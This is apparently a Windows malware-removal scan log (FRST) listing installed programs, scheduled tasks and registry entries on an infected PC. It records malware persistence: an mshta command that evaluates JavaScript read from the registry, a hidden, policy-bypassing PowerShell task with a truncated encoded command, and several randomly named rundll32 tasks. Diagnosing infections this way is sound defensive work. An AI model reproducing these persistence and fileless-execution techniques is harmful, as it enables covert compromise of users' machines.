Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version:  - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version:  - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version:  - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version:  - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version:  - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version:  - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth ™ II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door -  Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version:  - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version:  - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version:  - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version:  - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version:  - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version:  - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2014-05-12 10:49 - 2014-05-12 10:49 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com

